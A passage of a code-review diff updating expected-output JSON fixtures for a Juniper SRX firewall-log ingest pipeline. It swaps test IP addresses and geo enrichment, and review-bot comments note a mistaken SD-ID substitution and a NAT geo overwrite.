packet-incoming-interface=\"st0.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" 
application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_started", @@ -163,8 +163,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.065997020Z", - "original": "\u003c14\u003e1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.134 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"10.128.0.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.706995100Z", + "original": "\u003c14\u003e1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"10.128.0.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_deny", 
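Review bot: The structured-data ID inside `event.original` is rewritten from `junos@2636.1.1.1.2.134` to `junos@67.43.156.15`, but that token is an RFC 5424 SD-ID (`name@enterpriseNumber` plus a sub-OID, 2636 being Juniper's IANA enterprise number), not an IP address, so the address substitution appears to have matched the OID by accident. A real SRX log never carries an IP there, so the fixture no longer reflects the input format the pipeline will receive and any SD-ID handling is now exercised with a malformed value. The same replacement appears in the `@@ -163`, `@@ -268`, `@@ -411`, `@@ -537`, `@@ -649`, `@@ -772`, `@@ -911`, `@@ -1019` and `@@ -1158` hunks of this file; restoring `junos@2636.1.1.1.2.134` (and the corresponding original SD-ID in each) while keeping the changes to the `source-address`/`destination-address` fields would preserve the intent of the commit. The substitution presumably also landed in the `test-flow.log` input these expectations are generated from, so that file would need the same correction before regenerating.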
@@ -181,57 +181,45 @@ { "server": { "port": 2003, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 2003, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "rule": { "name": "log-all-else" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 56639, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "juniper": { "srx": { 
@@ -268,17 +256,17 @@ }, "related": { "ip": [ - "89.160.20.112" + "67.43.156.15" ] }, "client": { "port": 56639, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066000026Z", - "original": "\u003c14\u003e1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.39 source-address=\"89.160.20.112\" source-port=\"56639\" destination-address=\"89.160.20.112\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"]", + "ingested": "2021-12-10T10:13:51.706999500Z", + "original": "\u003c14\u003e1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address=\"67.43.156.15\" source-port=\"56639\" destination-address=\"67.43.156.15\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"]", "kind": "event", "action": "flow_deny", "category": [ @@ -299,7 +287,7 @@ "port": 902, "bytes": 0, "packets": 0, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "log": { "level": "informational" 
@@ -307,29 +295,23 @@ "destination": { "nat": { "port": 902, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 902, "bytes": 0, - "ip": "89.160.20.112", + "ip": "67.43.156.15", "packets": 0 }, "rule": { @@ -338,29 +320,23 @@ "source": { "nat": { "port": 63456, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 63456, "bytes": 94, - "ip": "89.160.20.112", + "ip": "67.43.156.15", "packets": 1 }, "juniper": { @@ -401,7 +377,7 @@ }, "related": { "ip": [ - "89.160.20.112" + "67.43.156.15" ] }, "client": { 
@@ -411,13 +387,13 @@ "port": 63456, "bytes": 94, "packets": 1, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066019422Z", - "original": "\u003c14\u003e1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.39 reason=\"unset\" source-address=\"89.160.20.112\" source-port=\"63456\" destination-address=\"89.160.20.112\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"89.160.20.112\" nat-source-port=\"63456\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"]", + "ingested": "2021-12-10T10:13:51.707006900Z", + "original": "\u003c14\u003e1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"unset\" source-address=\"67.43.156.15\" source-port=\"63456\" destination-address=\"67.43.156.15\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"67.43.156.15\" nat-source-port=\"63456\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"]", "kind": "event", 
"start": "2014-05-01T08:28:10.933Z", "action": "flow_close", @@ -439,7 +415,7 @@ "port": 768 }, "port": 768, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -447,22 +423,22 @@ "destination": { "nat": { "port": 768, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 768, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "rule": { "name": "alg-policy" @@ -470,28 +446,22 @@ "source": { "nat": { "port": 24065, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 24065, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -528,8 +498,7 @@ }, "related": { "ip": [ - "89.160.20.112", - "81.2.69.193" + "67.43.156.14" ] }, "client": { 
@@ -537,12 +506,12 @@ "port": 24065 }, "port": 24065, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066022898Z", - "original": "\u003c14\u003e1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.35 source-address=\"89.160.20.112\" source-port=\"24065\" destination-address=\"81.2.69.193\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"89.160.20.112\" nat-source-port=\"24065\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:13:51.707014500Z", + "original": "\u003c14\u003e1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"24065\" destination-address=\"67.43.156.14\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"24065\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", "kind": "event", "action": "flow_started", "category": [ @@ -562,7 +531,7 @@ "port": 46384 }, "port": 46384, - "ip": "89.160.20.112" + "ip": "192.168.100.12" }, "log": { "level": "informational" 
@@ -570,28 +539,22 @@ "destination": { "nat": { "port": 46384, - "ip": "18.51.100.12" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 46384, - "ip": "89.160.20.112" + "ip": "192.168.100.12" }, "rule": { "name": "policy1" @@ -599,10 +562,10 @@ "source": { "nat": { "port": 1, - "ip": "192.0.2.1" + "ip": "192.168.2.1" }, "port": 1, - "ip": "192.0.2.1" + "ip": "192.168.2.1" }, "juniper": { "srx": { @@ -639,9 +602,9 @@ }, "related": { "ip": [ - "192.0.2.1", - "89.160.20.112", - "18.51.100.12" + "192.168.2.1", + "192.168.100.12", + "67.43.156.14" ] }, "client": { 
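Review bot: In the `@@ -570` hunk `destination.ip` becomes the RFC 1918 address `192.168.100.12` while `destination.geo` and `destination.as` still carry public-address values (Bhutan, AS 35908); those can only have come from `destination.nat.ip` (`67.43.156.14`), which suggests the pipeline's NAT geoip lookup writes into the same `destination.geo` target and overwrites whatever the `destination.ip` lookup produced. Before this change `destination.ip` was the public `89.160.20.112` and the Sweden geo matched it, so the fixture never exposed that overwrite. If this is the intended behaviour it deserves a comment in the pipeline rather than being locked in silently by an expected-output file; the `@@ -684` hunk shows the same combination. If `destination.geo` is meant to describe `destination.ip`, a private destination should carry no geo at all and these expectations are now asserting a defect.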
@@ -649,12 +612,12 @@ "port": 1 }, "port": 1, - "ip": "192.0.2.1" + "ip": "192.168.2.1" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066025283Z", - "original": "\u003c14\u003e1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2626.192.0.2.1.40 source-address=\"192.0.2.1\" source-port=\"1\" destination-address=\"89.160.20.112\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.0.2.1\" nat-source-port=\"1\" nat-destination-address=\"18.51.100.12\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packet-incoming-interface=\"ge-0/0/1.0\"]", + "ingested": "2021-12-10T10:13:51.707020500Z", + "original": "\u003c14\u003e1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"192.168.2.1\" source-port=\"1\" destination-address=\"192.168.100.12\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.168.2.1\" nat-source-port=\"1\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packet-incoming-interface=\"ge-0/0/1.0\"]", "kind": "event", "action": "flow_started", "category": [ @@ -676,7 +639,7 @@ "port": 46384, "bytes": 84, "packets": 1, - "ip": "89.160.20.112" + "ip": "192.168.100.12" }, "log": { "level": "informational" 
@@ -684,29 +647,23 @@ "destination": { "nat": { "port": 46384, - "ip": "18.51.100.12" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 46384, "bytes": 84, - "ip": "89.160.20.112", + "ip": "192.168.100.12", "packets": 1 }, "rule": { @@ -715,12 +672,12 @@ "source": { "nat": { "port": 1, - "ip": "192.0.2.1" + "ip": "192.168.2.1" }, "port": 1, "bytes": 84, "packets": 1, - "ip": "192.0.2.1" + "ip": "192.168.2.1" }, "juniper": { "srx": { @@ -760,9 +717,9 @@ }, "related": { "ip": [ - "192.0.2.1", - "89.160.20.112", - "18.51.100.12" + "192.168.2.1", + "192.168.100.12", + "67.43.156.14" ] }, "client": { 
@@ -772,13 +729,13 @@ "port": 1, "bytes": 84, "packets": 1, - "ip": "192.0.2.1" + "ip": "192.168.2.1" }, "event": { "duration": 0, "severity": 14, - "ingested": "2021-12-06T12:25:20.066061331Z", - "original": "\u003c14\u003e1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2626.192.0.2.1.40 reason=\"response received\" source-address=\"192.0.2.1\" source-port=\"1\" destination-address=\"89.160.20.112\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.0.2.1\" nat-source-port=\"1\" nat-destination-address=\"18.51.100.12\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packets-from-client=\"1\" bytes-from-client=\"84\" packets-from-server=\"1\" bytes-from-server=\"84\" elapsed-time=\"0\" packet-incoming-interface=\"ge-0/0/1.0\"]", + "ingested": "2021-12-10T10:13:51.707025300Z", + "original": "\u003c14\u003e1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"response received\" source-address=\"192.168.2.1\" source-port=\"1\" destination-address=\"192.168.100.12\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.168.2.1\" nat-source-port=\"1\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packets-from-client=\"1\" bytes-from-client=\"84\" packets-from-server=\"1\" bytes-from-server=\"84\" elapsed-time=\"0\" packet-incoming-interface=\"ge-0/0/1.0\"]", "kind": "event", "start": "2010-09-30T06:55:07.188Z", "action": "flow_close", 
@@ -802,7 +759,7 @@ "port": 80, "bytes": 535, "packets": 4, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -810,29 +767,23 @@ "destination": { "nat": { "port": 80, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 80, "bytes": 535, - "ip": "89.160.20.112", + "ip": "67.43.156.15", "packets": 4 }, "rule": { @@ -895,7 +846,7 @@ "related": { "ip": [ "10.3.255.203", - "89.160.20.112", + "67.43.156.15", "10.3.136.49" ] }, 
@@ -911,8 +862,8 @@ "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066065298Z", - "original": "\u003c14\u003e1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"TCP FIN\" source-address=\"10.3.255.203\" source-port=\"47776\" destination-address=\"89.160.20.112\" destination-port=\"80\" connection-tag=\"0\" service-name=\"junos-http\" nat-source-address=\"10.3.136.49\" nat-source-port=\"19162\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"80\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"nat1\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit_all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"5\" packets-from-client=\"6\" bytes-from-client=\"337\" packets-from-server=\"4\" bytes-from-server=\"535\" elapsed-time=\"1\" application=\"HTTP\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/0.0\" encrypted=\"No\" application-category=\"Web\" application-sub-category=\"N/A\" application-risk=\"4\" application-characteristics=\"Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;\"]", + "ingested": "2021-12-10T10:13:51.707031700Z", + "original": "\u003c14\u003e1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP FIN\" source-address=\"10.3.255.203\" source-port=\"47776\" destination-address=\"67.43.156.15\" destination-port=\"80\" connection-tag=\"0\" service-name=\"junos-http\" nat-source-address=\"10.3.136.49\" nat-source-port=\"19162\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"nat1\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit_all\" 
source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"5\" packets-from-client=\"6\" bytes-from-client=\"337\" packets-from-server=\"4\" bytes-from-server=\"535\" elapsed-time=\"1\" application=\"HTTP\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/0.0\" encrypted=\"No\" application-category=\"Web\" application-sub-category=\"N/A\" application-risk=\"4\" application-characteristics=\"Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;\"]", "risk_score": 4.0, "kind": "event", "start": "2019-04-12T14:29:06.576Z", 
@@ -1019,8 +970,8 @@ "event": { "duration": 16000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066067813Z", - "original": "\u003c14\u003e1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.58 reason=\"TCP RST\" source-address=\"192.168.2.164\" source-port=\"53232\" destination-address=\"172.16.1.19\" destination-port=\"445\" service-name=\"junos-smb\" nat-source-address=\"192.168.2.164\" nat-source-port=\"53232\" nat-destination-address=\"172.16.1.19\" nat-destination-port=\"445\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"35\" source-zone-name=\"Trust\" destination-zone-name=\"Trust\" session-id-32=\"206\" packets-from-client=\"13\" bytes-from-client=\"4274\" packets-from-server=\"9\" bytes-from-server=\"1575\" elapsed-time=\"16\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/2.0\"]", + "ingested": "2021-12-10T10:13:51.707037500Z", + "original": "\u003c14\u003e1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP RST\" source-address=\"192.168.2.164\" source-port=\"53232\" destination-address=\"172.16.1.19\" destination-port=\"445\" service-name=\"junos-smb\" nat-source-address=\"192.168.2.164\" nat-source-port=\"53232\" nat-destination-address=\"172.16.1.19\" nat-destination-port=\"445\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"35\" source-zone-name=\"Trust\" destination-zone-name=\"Trust\" session-id-32=\"206\" packets-from-client=\"13\" bytes-from-client=\"4274\" packets-from-server=\"9\" bytes-from-server=\"1575\" elapsed-time=\"16\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/2.0\"]", "kind": "event", "start": "2019-04-13T14:33:06.576Z", "action": "flow_close", 
@@ -1044,7 +995,7 @@ "port": 53, "bytes": 136, "packets": 1, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1052,29 +1003,23 @@ "destination": { "nat": { "port": 53, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 53, "bytes": 136, - "ip": "89.160.20.112", + "ip": "67.43.156.14", "packets": 1 }, "rule": { @@ -1083,29 +1028,23 @@ "source": { "nat": { "port": 11152, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 52890, "bytes": 72, - "ip": "89.160.20.112", + "ip": "67.43.156.14", "packets": 1 }, "juniper": { @@ -1148,7 +1087,7 @@ }, "related": { "ip": [ - "89.160.20.112" + "67.43.156.14" ] }, "client": { 
@@ -1158,13 +1097,13 @@ "port": 52890, "bytes": 72, "packets": 1, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "event": { "duration": 8000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066069947Z", - "original": "\u003c14\u003e1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.34 reason=\"idle Timeout\" source-address=\"89.160.20.112\" source-port=\"52890\" destination-address=\"89.160.20.112\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"89.160.20.112\" nat-source-port=\"11152\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:13:51.707045Z", + "original": "\u003c14\u003e1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"67.43.156.14\" source-port=\"52890\" destination-address=\"67.43.156.14\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"11152\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" 
application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"]", "kind": "event", "start": "2018-10-07T01:32:20.898Z", "action": "flow_close", @@ -1188,7 +1127,7 @@ "port": 53, "bytes": 116, "packets": 1, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -1196,29 +1135,23 @@ "destination": { "nat": { "port": 53, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 53, "bytes": 116, - "ip": "89.160.20.112", + "ip": 